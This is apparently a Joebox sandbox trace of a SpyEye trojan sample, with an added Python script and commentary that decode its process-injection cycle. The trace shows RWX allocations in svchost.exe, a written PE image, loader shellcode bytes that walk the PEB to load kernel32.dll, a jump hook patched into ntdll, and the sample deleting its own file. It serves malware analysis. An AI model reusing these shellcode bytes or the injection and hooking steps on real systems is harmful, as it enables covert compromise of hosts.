System info queried Type: BasicInformation success or wait 2019916349
System info queried Type: ProcessorInformation success or wait 2019918938
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019925766
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019945203
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019956181
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019957894
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019958324
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019958985
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019962617
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019962997
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019964254
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019965772
System info queried Type: BasicInformation success or wait 2019968456
System info queried Type: ProcessorInformation success or wait 2019984256
Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: EB0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2020033456
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2020034794
Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 5A 84 success or wait 2020059338
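The PID 892 events above are one complete injection cycle, and the same cycle repeats below for PIDs 968, 1052, 1100, 1144 and 1496 and then for explorer.exe: a region at 0BAD0000 is made writable and executable and a 286720-byte (0x46000) PE image is written into it; a 13-byte stub is written at 0BADAFFC (mov eax,0; push eax; mov edx,0BAF15B0; call edx, that is a call into the image at +0x215B0 with one zero argument); a second region receives a 4096-byte loader whose first bytes read the PEB from fs:[30], follow Ldr to InInitializationOrderModuleList and take the first module's DllBase, push the hash 78740534 to a resolver, then build L"kernel32.dll" as a UNICODE_STRING and call the resolved function with (NULL, 0, &name, &handle), the argument order of LdrLoadDll; finally five bytes beginning with E9 are written at 7C90CFEE, which lies inside ntdll.dll (ImageBase 7C900000 and SizeOfImage 0xB2000 according to the ntdll header the sample reads just before). The script below is an added example, not part of the Joebox report or of the SpyEye sample. It decodes these writes from lines copied out of the trace (the loader value is cut to its first 32 bytes and the image dump's zero runs are written as padding); the Joebox line grammar it parses is inferred from those lines and is an assumption, as is every function name in it.

```python
"""Decode the injection cycle in the Joebox trace above.  Added example, not part of the
Joebox report or of the SpyEye sample; EVENT_RE is inferred from the visible lines."""
import re
import struct
from collections import defaultdict

NTDLL_BASE = 0x7C900000  # ImageBase in the ntdll.dll optional header the sample reads
NTDLL_SIZE = 0x000B2000  # SizeOfImage from the same header ("00 20 0B 00")

# Head of the image written at 0BAD0000, as logged: MZ header, e_lfanew 0xD0 at offset
# 0x3C, PE header at 0xD0.  The all-zero runs of the dump are written as padding.
IMAGE_DUMP = (
    bytes.fromhex("4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00")
    + bytes(0x3C - 0x20) + bytes.fromhex("D0 00 00 00") + bytes(0xD0 - 0x40)
    + bytes.fromhex("50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 "
                    "0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00"))
# Constructed sample: the PID 892 write events plus the lsass.exe hook write, copied from
# the trace; the 4096-byte loader write is cut to its first 32 bytes.
SAMPLE_LOG = "\n".join([
    r"Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 0A 84 success or wait 2017349200",
    r"Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: "
    + IMAGE_DUMP.hex(" ").upper() + " success or wait 2019260127",
    r"Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2019914781",
    r"Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: EB0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 success or wait 2020033456",
    r"Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2020034794",
    r"Memory written PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 5A 84 success or wait 2020059338",
])

EVENT_RE = re.compile(
    r"^(?P<kind>Memory allocated|Memory written|Memory attributes changed) "
    r"PID: (?P<pid>\d+) Path: (?P<path>\S+) Base: (?P<base>[0-9A-F]+) Length: (?P<len>[0-9A-F]+)"
    r"(?: Value: (?P<value>(?:[0-9A-F]{2} )+))?.*?"
    r"(?P<status>success or wait|conflicting addresses) \d+$")
# mov eax,fs:[30]; mov eax,[eax+0C]; mov eax,[eax+1C]; mov eax,[eax+8]:
# PEB -> Ldr -> InInitializationOrderModuleList.Flink -> DllBase of the first module
PEB_WALK = bytes.fromhex("64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08")


def parse_events(log):
    """Joebox prints write lengths in decimal but allocation/protection lengths in hex
    (0x46000 == 286720 in the trace), so the radix depends on the event kind."""
    events = []
    for line in log.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append({
                "kind": m["kind"], "pid": int(m["pid"]), "path": m["path"],
                "base": int(m["base"], 16),
                "length": int(m["len"], 10 if m["kind"] == "Memory written" else 16),
                "value": bytes.fromhex(m["value"]) if m["value"] else b""})
    return events


def decode_jmp_rel32(addr, patch):
    """E9 rel32: target = address of the next instruction + signed displacement."""
    if len(patch) != 5 or patch[0] != 0xE9:
        return None
    return (addr + 5 + struct.unpack_from("<i", patch, 1)[0]) & 0xFFFFFFFF


def decode_bootstrap_stub(patch):
    """B8 imm32 / 50 / BA imm32 / FF D2 = mov eax,imm; push eax; mov edx,imm; call edx.
    Returns (pushed argument, call target), or None for anything else."""
    if len(patch) != 13 or patch[0] != 0xB8 or patch[5] != 0x50 or patch[6] != 0xBA \
            or patch[11:] != b"\xFF\xD2":
        return None
    return struct.unpack_from("<I", patch, 1)[0], struct.unpack_from("<I", patch, 7)[0]


def parse_pe_header(blob):
    """COFF header plus the first optional-header fields: enough to fingerprint the image."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, ts, _, _, _, chars = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    magic, lmaj, lmin, _, _, _, entry = struct.unpack_from("<HBBIIII", blob, e_lfanew + 24)
    return {"machine": machine, "sections": nsec, "timestamp": ts, "characteristics": chars,
            "pe32": magic == 0x10B, "linker": (lmaj, lmin), "entry_rva": entry}


def analyse(log):
    """Per PID: image header, stub and hook, each resolved against the regions that PID
    received through Memory written events (base, declared length)."""
    by_pid = defaultdict(list)
    for ev in parse_events(log):
        if ev["kind"] == "Memory written":
            by_pid[ev["pid"]].append(ev)
    report = {}
    for pid, writes in by_pid.items():
        regions = [(w["base"], w["base"] + w["length"]) for w in writes]
        locate = lambda a: next(((lo, a - lo) for lo, hi in regions if lo <= a < hi), None)
        r = {"path": writes[0]["path"]}
        for w in writes:
            v, at = w["value"], w["base"]
            if v[:2] == b"MZ":
                r["image"] = {"base": at, "size": w["length"], **parse_pe_header(v)}
            elif (stub := decode_bootstrap_stub(v)) is not None:
                r["stub"] = {"at": at, "arg": stub[0], "call": stub[1], "call_in": locate(stub[1])}
            elif (target := decode_jmp_rel32(at, v)) is not None:
                r["hook"] = {"at": at, "in_ntdll": NTDLL_BASE <= at < NTDLL_BASE + NTDLL_SIZE,
                             "target": target, "target_in": locate(target)}
            elif PEB_WALK in v:
                r["loader"] = {"at": at, "size": w["length"], "peb_walk": True}
        report[pid] = r
    return report


if __name__ == "__main__":
    for pid, r in analyse(SAMPLE_LOG).items():
        print(pid, r)
```

The E9 patch is a relative jump, so its displacement differs per process although every hook is written at the same ntdll address: for PID 892 it resolves to 00EB03B2, offset 0x3B2 of the 4096-byte loader region at 00EB0000 in that process, and the same arithmetic applied to the later cycles gives 00AF03B2, 01A803B2, 008903B2, 009903B2 and 00A403B2, each the loader region of its own process plus 0x3B2. The lsass.exe write resolves to 009B03B2, which matches no region in the sample, so the script reports target_in as None rather than guessing. The stub calls image+0x215B0, not the entry point 0x21915 recovered from the header, and its call target is an absolute address into the 0BAD0000 image, which is worth re-checking for explorer.exe later in the trace, where 0BAD0000 and 0BB16000 both fail with 'conflicting addresses' and the image is written at 0BB50000 instead. The link timestamp 4E86809D decodes to 1 October 2011 UTC; compare it with the analysis date, remembering that the field is trivially forged.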
Memory allocated PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2020066407
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2020067099
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2020084125
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2020085038
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2021388367
Thread delayed Time: 0 TID: 4214 success or wait 2021389874
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2021419814
Memory allocated PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: AF0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2021420333
System info queried Type: BasicInformation success or wait 2021420883
System info queried Type: ProcessorInformation success or wait 2021420994
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2021421372
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021427159
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2021427260
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021431745
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2021431838
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2021432368
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021433094
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2021433191
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2021434027
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2021434150
System info queried Type: BasicInformation success or wait 2021435268
System info queried Type: ProcessorInformation success or wait 2021435376
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: AF0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2021463445
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2021470039
Memory written PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 1E 84 success or wait 2021492108
Memory allocated PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2021492833
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2021492946
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2021493067
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2021493177
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2029171502
Thread delayed Time: 0 TID: 4214 success or wait 2029171972
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 2029172778
Thread delayed Time: 1 TID: 9266 success or wait 2029173914
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2029201118
Memory allocated PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 1A80000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2029201233
System info queried Type: BasicInformation success or wait 2029201352
System info queried Type: ProcessorInformation success or wait 2029201451
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2029201601
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029201909
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2029201996
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029202215
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2029202305
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2029202413
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029202621
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2029202709
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2029202892
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2029203009
System info queried Type: BasicInformation success or wait 2029203303
System info queried Type: ProcessorInformation success or wait 2029203404
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 1A80000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2029228936
Memory attributes changed PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2029229065
Memory written PID: 1052 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 17 85 success or wait 2029252853
Memory allocated PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2029253338
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2029253452
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2029253573
Memory attributes changed PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2029253682
Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2030258558
Memory written PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2030280542
Thread delayed Time: 0 TID: 4214 success or wait 2030280901
Memory allocated PID: 1100 Path: C:\WINDOWS\system32\svchost.exe Base: 890000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2031061074
System info queried Type: BasicInformation success or wait 2031063534
System info queried Type: ProcessorInformation success or wait 2031065525
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031067336
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031104461
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2031121401
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031126666
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031145423
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2031151620
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031191498
Thread delayed Time: 0 TID: 4214 success or wait 2031392773
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2031549777
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2031552664
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031552990
System info queried Type: BasicInformation success or wait 2031576528
System info queried Type: ProcessorInformation success or wait 2031576820
